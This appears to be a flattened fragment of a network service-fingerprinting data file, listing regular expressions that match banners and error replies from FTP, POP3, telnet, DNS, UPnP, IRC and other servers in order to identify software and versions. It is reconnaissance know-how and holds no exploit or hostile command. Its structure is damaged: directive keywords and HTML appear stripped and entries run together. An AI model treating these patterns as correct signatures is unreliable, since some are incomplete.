{name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n +\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 +HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. +HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n +HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n +0, 0: ERROR: UNKNOWN-ERROR\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +0 , 0 : ERROR : INVALID-PORT\r\n + : ERROR : UNKNOWN-ERROR\r\n +0, 0 : ERROR : X-INVALID-REQUEST\r\n +0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n +0, 0 : ERROR : INVALID-PORT\r\n +0,0 : ERROR : INVALID-PORT\r\n +0 , 0 : ERROR :INVALID-PORT\r\n + : USERID : UNIX : ([-\w_]+) + : USERID : UNIX : [a-z]{4,8}\r\n +1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n +, : USERID : UNIX : [^\r\n]+\r\n +\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n +ERR password required\r\nERR password required\r\n +ERR administrator password required\r\nERR administrator password required\r\n + \r\nSorry, that nickname format is invalid\.\r\r\n +:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n +\+OK \r\n-ERR XXX authorization first\r\n +HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n +ERROR: Command doesn't seem to be followed by a space followed by arguments\n +.\x08\0\0 +500 access denied: Check networking/linuxconf network access\r\n +BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n +\x02\x02 +ERROR\r\nERROR\r\n +\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERROR: Unknown request number\. +ERROR: Invalid password\.\nERROR: Invalid password\.\n +HP OpenView OmniBack II ([-.\w]+): INET, +\0\0\xfa\xda\0\x02 +598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server +\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n +\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 +\+OK pop server ready\r\n +\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n +-ERR Invalid command\.\r\n-ERR Invalid command\.\r\n +\+OK POP3 ready\r\n-ERR invalid command\r\n +\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n +\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n +EInvalid packet length\0 +EFATAL 1: invalid length of startup packet\n\0 +\xff +\xc0\0\x12Data field missing +\xff\x17Access to unopened port. +Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n +\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERR 27 +\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 +\x05\x01\0.\0\0\0\0\0\0 +\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP +SPAMD/1\.0 76 Bad header line: \r\n +ERHD +\x01\0\0\0 +SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 +\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer +\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: +514 Authentication required\.\r\n +login: Password: Login incorrect\. +login: uucpd: \d+-\d+ The user is not known\.\n +%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n +% No entries found for the selected source\(s\)\.\n +128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n +\x02\x01 +SDPACK +\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n +\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: +\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy +\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n +\xff\xfb\x01Login: \r\nLogin: \r\nLogin: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: +\xff\xfb\x01\n\r-> \n\r-> \n\r-> +bad password\r\n +\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: +\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n +\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: +\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\r\nPress return:\*\*\*\*\r\nEnter Password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server +\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n +\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( +\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: + 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n +User Name: \r\r\nPassword: \r\r\nRemote MAC address: +\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) +\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: +\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: +\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n +\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n +\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> +\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request + 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 +\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> +\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n +\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 +\0\x1e\0\x06\0\t\0\0 +\0\x11Invalid command\n\0\0\0 +\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 +\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 +1\0 +\0&\xeb\xefTQM\xee\[B +\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c +\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 +\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 +HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n +\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 +\0\0s\0\0\0\0\0 +\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r +\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n +220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n +220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n +cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? +cvs \[server aborted\]: bad auth protocol start: HELP\r\n +cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n +cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n +HELP\r\n +220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n +220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n +220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n +220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd +220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n +220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n +220 FTP server ready\r\n211 HELP text\r\n +220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n +220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n +(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n +220 Service Ready\r\n502 Command Not implemented\r\n +HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +HELP : USERID : UNIX : trilluser\r\n +\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n +0, 0 : ERROR : UNKNOWN-ERROR +:([-\w_.]+) 451 \* :You have not registered\r\n +:([-\w_.]+) 451 \* :Register first\.\r\n +NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n +:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n +200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd +\x01Socket \d+ received unknown command 0x48 with arguments ELP +false;error while receiving message from client\n +220 ([-.+\w]+) Generic SMTP handler\r\n214 